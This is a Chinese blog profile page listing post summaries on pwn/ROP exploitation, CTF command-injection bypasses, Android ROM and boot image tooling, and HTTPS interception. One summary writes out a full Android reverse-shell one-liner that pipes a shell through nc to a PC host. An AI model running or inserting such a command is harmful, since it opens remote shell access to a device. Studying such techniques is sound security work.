- 博客(887)
- 资源 (45)
- 收藏
- 关注
原创 二、pwn - 零基础ROP之PIE保护绕过-碰撞
本文唯一区别在于,我们不利用vulnerable_function打印的地址,无法定位pie base地址,直接随机碰撞(爆破)~ 有一定比例成功的可能,贴近实战!但是呢,内存溢出后覆盖PC,要么修改2位、4、6、8...位,无法修改3位,又因为arm是小端模式,例如0x6b25741, 在内存中排列为0x41 0x57 0x6b...所以0x70d 是低地址,前面存在1位 未知的数值,在1-F (16进制)之间,可能是0x170d、也可能是0x270d、0x370d...0xf70d。
2024-04-18 15:43:33 181 1
原创 pwn程序已经运行了,payload字节数组包含不可见字符,无法进行utf8编码,这个时候怎么输入?
如果你想要使用 Python 脚本向一个已经运行的程序发送包含不可见字符的 payload,你需要确保你有一种方法来将 Python 脚本的输出重定向到该程序的输入。如果你的程序已经在运行,并且你可以使用 GDB 附加到进程,那么你可以使用 GDB 来修改内存或者调用函数来发送你的 payload。在实践中,如果你没有权限或者无法确定程序的 PID,或者程序不是从标准输入读取数据,你可能需要考虑使用其他的方法(比如 GDB 或者修改程序的运行方式来接受来自特定管道或文件的输入)。目录下的文件描述符来写入。
2024-04-17 23:36:56 847
原创 一、pwn - 零基础ROP之Android ARM 32位篇(新修订,精华篇)
一旦你知道了溢出的偏移量,你就可以构造一个包含NOP滑梯、shellcode以及用于覆盖PC的正确地址的有效载荷。你需要确保shellcode位于溢出点之后,并且PC被设置为指向NOP滑梯的开始部分,这样当执行流到达该位置时就会滑入你的shellcode并执行。使用模式创建工具来确定哪部分输入覆盖了程序计数器(PC),是一种常见的方法,特别是在开发缓冲区溢出漏洞利用时。当程序崩溃时,检查程序计数器(PC)的值。工具将输出一个数字,表示在模式中的偏移量,这个数字就是从输入数据的开始到覆盖PC的点的字节数。
2024-04-17 18:18:54 519
转载 pwndbg 基本操作指令
/生成50个用来溢出的字符,如:aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama。//显示rdi寄存器的值,注意和x的区别,这只是显示rdi的值,而不是rdi指向的值。//查看0x123456地址的值,//计算0x10-0x08的结果。//打印fun_name的地址,//显示arena的详细信息。//打印包含返回地址的栈地址。//像IDA那样显示数据,//直接看canary的值。//显示rdi指向的值。//查看变量a的地址。,会跟提示所有操作堆的地方。
2024-04-17 10:14:08 10
原创 一行代码实现Android反向shell(Reverse shell)
cd /data/data/你的私有目录 && mkfifo f && cat f | /system/bin/sh -i 2>&1 | nc PC_IP 4444 > f。你的私有目录 这个目录可以是你APK的目录,或者你权限读写执行的目录。通过反向shell,即使你无法启用 adb,你也可以拥有一个反向 shell 并通过你的 PC 控制手机。本文通过一行代码即可实现Android反向shell(Reverse shell)。网上关于android得反向shell 多是需要安装apk的,操作麻烦。
2024-04-12 21:00:12 184
转载 CTF-命令注入绕过技巧总结
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
2024-04-10 17:21:46 24
转载 Linux设置Swap虚拟内存方法
*MySQL 报错InnoDB: Cannot allocate memory for the buffer pool,后来发现是虚拟内存不够。**
2024-04-08 10:58:20 27
转载 CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过
学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。
2024-04-01 17:04:41 53
转载 使用Wireshark获取USB数据
Wireshark是世界上最流行的网络协议分析软件,并且是一个免费的、开源的工具。相信做过网络开发的一定用过这个工具进行过抓包分析。借助USBUSBPcap从I/O请求包(IRP)中携带的USB请求块(URBs)中捕获数据。Wireshark将报文以帧的形式呈现。USBPcap的数据包与USB规范的数据包不完全相同,Wireshark的帧与USB帧也不同。
2024-03-26 11:33:08 313
转载 C语言中不安全函数、安全函数
那么,您应该认为如果您的缓冲区足够大,可以处理可能的最长名称,您的程序会 安全,对吗?它可以做与 gets() 所做的同样的事情,但它接受用来限制读入字符数目的大小参数,因此,提供了一种防止缓冲区溢出的方法。遗憾的是,即使是系统调用的“安全”版本 ― 譬如,相对于 strcpy() 的 strncpy() ― 也不完全安全。然而,获得效率的代价是,C 程序员必须十分警觉,并且有极强的安全意识,才能防止他们的程序出现问题,而且即使这些,使代码不出问题也不容易。没有实际执行堆栈中的代码,只有堆中的代码。
2024-03-08 15:19:38 112
原创 Android抓包--不走代理的请求Proxy.NO_PROXY,过代理检测,burpsuite+Postern
网上很多不走代理检测的抓包都是charles + Postern 或 charles + Postern + burpsuite,本文使用burpsuite+Postern。
2024-03-05 16:31:30 644
原创 android系统开发之-- 修改buid.prop、init.rc、禁用BL锁、关闭dm-verity
在这个文件中,可以找到build.prop文件的相关配置信息。这个文件定义了Android系统的初始化过程和启动时的行为。
2024-03-01 10:26:58 917 1
原创 android系统开发之--ROM编译,repo使用指南
事实上,当repo init完成,在本地的.repo/manifests目录下就可以看到manifest这个git project,可以用git branch -av来查看branch,用git log来查看日志。3. -m指定的是,下载该git project中的哪个文件(应该是首先切换了branch,然后再下载该文件)。-c 的意思是只下载manifest中定义的当前分支,不下载其他分支,manifest中默认会开启 -c。-d 的意思脱离本地分支,切换到服务器的分支,前提是本地代码要clean。
2024-02-28 14:49:05 545
原创 【精华】android抓包https(tls)全教程,openssl生成burpsuite证书,并导入
为什么需要365天证书,因为chrome等一些软件会检测证书时长,太长了报错:证书有效期过长的错误1、openssl生成burpsuite证书然后一路按回车,直到生成2、生成p12证书文件自定义一个密码,比如1234563、导入到burpsuite,点击代理-选项-导入/导出ca证书-进口(import)-来自pkcs12密钥库的证书和密钥,选择burp.pfx文件,输入密码,点击下一步完成。
2024-02-27 15:03:28 1039
转载 Bootloader 中有什么办法判断 APP 是否有效?(固件升级)
今天在论坛看到这么一个提问:在嵌入式产品开发初期,我们一般都会用下载器或者仿真器接到板子的下载口进行下载和调试,而一旦产品进入到市场,由于批量品的下载口往往会在产品外壳内部,有些产品甚至在发布时会去掉下载口,此时再使用下载器就会变得非常麻烦,对于去掉下载口的直接无法完成程序的升级!因此我们一般都会在产品中加入在线升级功能,即通过产品内部的一段升级程序将应用程序更新掉,从而实现无需借助外部烧录工具就可以将程序进行升级。如今的手机、智能手表的升级功能就是使用了这种设计。
2024-02-22 16:13:00 192
原创 【教程】N2N V3内网穿透、异地组网,包括Win/Linux/Android,包括不同内网实现adb远程连接
其中,-l是云服务器实例的公网 IPv4 地址和端口号,-a参数是指定自己虚拟网卡的地址,可以在有限范围内乱编,当然更推荐的是使用自动分配地址,建议先凑合着用静态分配的,-k参数是密钥,-d参数是TAP虚拟网卡适配器的名字, 至于其他,照搬过来就好,至于-c参数 表示小组名称,只有同属一个相同-c的同网段用户,才能相互访问得到。TCP 和UDP都放开吧。说下背景,因为某些原因,需要远程调试客户的Android手机,而且,还是异地的客户。如果你电脑装了openvpn,那么默认就装过了,这个步骤可以跳过。
2024-02-20 17:44:55 1376
原创 【解决】ping6: connect: Network is unreachable(ping IPv6不通)
linux 下,ping 某个IPV6报错,例如:ping6 zjj.sz.gov.cn。
2024-02-19 16:51:57 1504
原创 cmd: Failure calling service package: Failed transaction(2147483646)
解决cmd: Failure calling service package: Failed transaction(2147483646)
2024-02-02 16:12:28 770
原创 Android super.img解包和打包指南(含工具下载lpunpack、lpmake、lpdump)
Android super.img的解包和打包指南,含工具下载lpunpack、lpmake、lpdump
2024-02-01 14:57:04 3346
转载 Android-based PAX POS vulnerabilities (Part 1)
Banking companies worldwide are finally shifting away from custom-made Point of Sale (POS) devices towards the wildly adopted and battle-tested Android operating system. No more obscure terminals; the era of giant, colorful touchscreens is here! While Andr
2024-01-18 10:59:30 113
转载 如何进行电压故障注入
在物联网设备的物理安全评估过程中,目标之一是利用调试接口或可访问芯片来研究设备的工作原理。理想的情况是提取整个文件系统,以找到获得设备 root 访问权限的方法。然后,可以更轻松地检查正在运行的服务,并在需要时对其进行调试,以最终控制目标。在审计开始时,通常会遇到调试接口上的保护,禁止访问其全部功能,或者引导链上的保护,禁止对其进行任何修改。故障是尝试绕过这种保护的一种方法。在这篇博文中,我们将通过几个研究案例深入探讨电压毛刺,以了解它的工作原理以及它如何提供帮助。
2024-01-17 16:36:16 143
翻译 用于 Linux 系统故障排除和收集信息的 7 个“dmesg”命令(打印内核日志)
2003288K/2059928K可用(6352K内核代码,607K rwdata,2640K rodata,880K init,908K bss,56640K保留,1146920K highmem)是的,如果需要,我们可以使用以下命令清除 dmesg 日志。当我们连接或断开系统上的硬件设备时,借助 dmesg 命令,我们可以实时了解检测到或断开的信息。[0.000000]BIOS-e820:[mem 0x0000000000100000-0x000000007dc08bff]可用。
2024-01-10 17:35:30 343
转载 演示Heap Spray(堆喷射)的原理
常见方法有:溢出栈变量,因为baseObj指针保存在栈上,溢出后baseObj指向的不再是堆上的base对象,而是指向某个被伪造的数值。之后baseObj去虚函数表0x0c0c0c0c中取虚函数,由于0x0c0c0c0c附近的内存块取到的值都是0x0c0c0c0c,而这个值被进程当做函数指针,因此最后会发生类似call 0x0c0c0c0c,引导Eip去堆空间0x0c0c0c0c处取指令运行。12ff6c是指针变量baseObj在栈上的地址,其值指向0x4300A0----这是分配在堆上的base对象。
2024-01-10 11:22:31 147
原创 【解决】executable‘s TLS segment is underaligned: alignment is 8, needs to be at least 32 for ARM Bionic
解决办法:使用ndk-r21e,指定`--sysroot=/path/to/ndk-r21e/**/sysroot`标志,
2024-01-08 17:38:11 504
转载 直接修改ROM的init.rc,重新打包刷入不生效的原因
不能经过adb shell修改的缘由(8楼) spainit.rc 是 rootfs 中的文件,Android 将 rootfs(initramfs) link 到 linux kernel image 中,生成正常启动的boot.img, recovery 模式的 recovery.img. get。
2023-12-31 18:26:43 206
转载 Magisk 对 boot.img 做了什么?
总之,Magisk 主要通过向 boot.img 中添加二进制文件和修改 init 脚本来注入 Magisk 框架并获取 root 权限,同时禁用某些功能以避免干扰。
2023-12-30 21:46:46 198
转载 修改Android开机Logo、动画、充电图标等
在mediatek/source/external/boot_logo_upater/Android.mk中会将boot_logo 文件放到out/target/product/system/media/images/boot_logo. 这样就放到了system.img中.Logo/update 针对hvga_XXX_kernel.bmp有特殊处理,将其转成raw文件并命名为/logo/boot_logo。hvga_uboot.bmp是第一屏,hvga_kernel.bmp是第二屏。
2023-12-25 10:41:22 492
转载 STS、CTS、GTS、VTS测试指南
Android Security Test Suite (STS) 是谷歌关于android安全补丁安装情况的一个测试套件STS和security patch相关的,是CTS测试新增加一项安全测试套件。STS是201808才开始测试的。Security patch日期在3个月内是GTS的一个case,如果不通过无法获得google认证。在18年5月之前谷歌对于security patch这个属性都是在build库下面跟着aosp更新的。现在需要通过STS之后由vendor来更新。
2023-12-20 17:46:32 625
转载 root(Magisk )环境下增加 adb root 功能
修改 ro.debuggable 为 1杀掉 adbd,让 __android_log_is_debuggable 返回为 1调用 adb root 用于配置 service.adb.root = 1adbd 正常是 root 用户启动,然后通过降权到 shell 用户,我们是通过修改属性来达到不降权;
2023-12-19 18:13:08 1527 1
转载 代码性能、代码大小优化指南(编译器、转译器)
在第一个示例中,我们可以下沉 Object 创建代码,因为我们仅会在 if(flag) 中用到这一语句,而不会在其他路径中使用,并且这二者位于同一 try 语句中。从长远来看,一部手机可以有约为 500M-1GB 的优化代码 (实际数字可能会更高或更低,这具体取决于您安装的应用数量,以及您安装了哪些特定的应用),因此这些优化环节可为每个设备节省约 50-100MB 的空间。只需从 try catch 中删除无效代码就足够了,不过更好的是,在某些情况下,我们还可以实施其他优化环节。假设我们正在运行若干线程。
2023-12-18 15:35:42 85
转载 安全多方计算与同态加密初探
同态加密关注的是数据处理安全,其提供了一种对加密过的数据进行处理的功能,也就是可以对加密后的数据进行处理,拥有密钥的用户对处理过的数据进行解密后,得到处理后的结果与对明文数据处理的结果一致。而一般的加密方案关注的都是数据存储安全,即用户是不能对加密结果做任何操作的,否则将会导致错误的解密,甚至解密失败用户想要处理一个数据,但是他的计算机计算能力较弱。这个用户可以使用云计算的概念,让云来帮助他处理得到结果。
2023-12-01 16:10:00 239
转载 赛博空间(Cyberspace):涵义、组成和特征
有些大型、复杂的网络,例如由北斗导航卫星接收、传递因特网信息和接收、发送电磁波的网络,其相关物理构件包括:卫星,飞机,舰船,地面发送、接收、转播站,地面和海上的计算机网络,全球因特网,等等。:赛博空间是在全球信息环境中存在的一类领域(Domain)的整体,由各自相对独立的、信息技术基础设施组成的网络构成,包含因特网、通讯网、计算机系统,以及嵌入网络中的处理器、控制器、设备等。本文先阐述了“赛博空间(Cyberspace)”的来源、定义和范围,再说明赛博空间的架构、组成,然后说明赛博空间的演变和特征。
2023-11-24 10:17:15 183
转载 iDASH 2023国际大赛 | 机密计算、同态加密
因此,隐私计算已逐渐成为该领域的关键技术,促进多方共同参与、合规挖掘利用数据的宝贵价值:来自不同数据源的生信数据经过加密处理后,存储在具备隐私计算能力的云平台上,进而为泛在数据使用提供所需服务。在密文计算的过程中,我们首先将被选取基因的明文掩码作用在每一条加密数据上,然后将计算后的数据库中心点和每条查询数据均提取到密文的实部上。在整个计算流程中,检查机构与数据机构的基因数据不能被泄露,计算机构必须在密文状态下处理基因数据,并且检查机构与数据机构在数据加密前不能进行相关预处理,即提高了系统能效要求。
2023-11-24 09:54:54 152
原创 【教程】Sqlite迁移到mysql(django)
db.sqlite3 是 sqlite 数据库文件output.sql是导出sql文件的名称。
2023-11-21 14:47:18 1391
原创 【解决】刷了Magisk修改后的boot,magisk仍然没有ROOT
将以下代码命名为su,然后push到android设备的/system/bin目录。然后即可root即可正常运行。
2023-10-18 16:01:27 2005
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
2024-04-17
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
2024-04-16
avbtool.py查看boot.img、system.img、vbmeta.img签名信息工具
2024-03-01
super.img解包打包工具-lpunpack、lpmake、lpdump
2024-02-01
android rom - logo.bin修改器中文版
2023-12-25
magisk模块,用于解决已经root,仍然提示adbd cannot run as root in production
2023-12-20
boot.img解压工具,可解决“unrecognized format. error!” 或 “ramdisk”报错
2023-01-05
卓岚TCP UDP调试助手+TCP-UDP服务管理V1.03+网络调试助手3.7
2022-10-13
make_ext4fs,linux下system.img打包工具
2022-07-26
支付卡行业(PCI )资料安全标准(PCI DSS)
2022-07-01
strace-5.15 arm和arm64架构,Android可用
2022-01-04
adb push /adb pull工具
2021-11-09
XCODE自动编译生成IPA脚本(IOS)
2020-12-11
electron-v11.0.3-win32-x64.zip
2020-11-29
Mac远程桌面连接windows,Microsoft Remote Desktop远程桌面工具10.5.0
2020-10-30
Obfuscation.sh,ollvm移植到LLVM10.0.1以及更高版本的脚本
2020-10-10
ollvm的混淆反混淆和定制修改.doc
2020-09-28
org.json等6个jar压缩包.rar
2020-09-04
DroidCam安卓+PC端,测试可用
2020-06-24
Notepad++ 插件,AndroidLogger.V1.2.7. 可以让安卓日志自动显示颜色
2020-05-14
JEB 3.0.0.201808031948_Pro
2020-05-13
USB驱动-CH341SER(CH340 USB转串口WINDOWS驱动程序)
2020-04-25
聊天机器人数据库,近2万条词汇sql
2019-11-22
SR5-SuperSU-v2.82-SR5-20171001224502.zipS
2019-03-14
linux_bootimg_tools
2019-03-12
libcurl.a静态库(.a文件) android可用,包含(armeabi、x86、arm64-v8a、x86_64)
2018-10-30
protoc-3.0.0-win32.zip 和 protobuf3-for-unity
2018-10-09
windows unzip.exe 6.0
2018-08-31
MemoryAnalyzer-1.6.1.20161125-win32.win32.x86_64
2017-06-24
详细分析了Android系统资源打包过程appt
2016-01-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人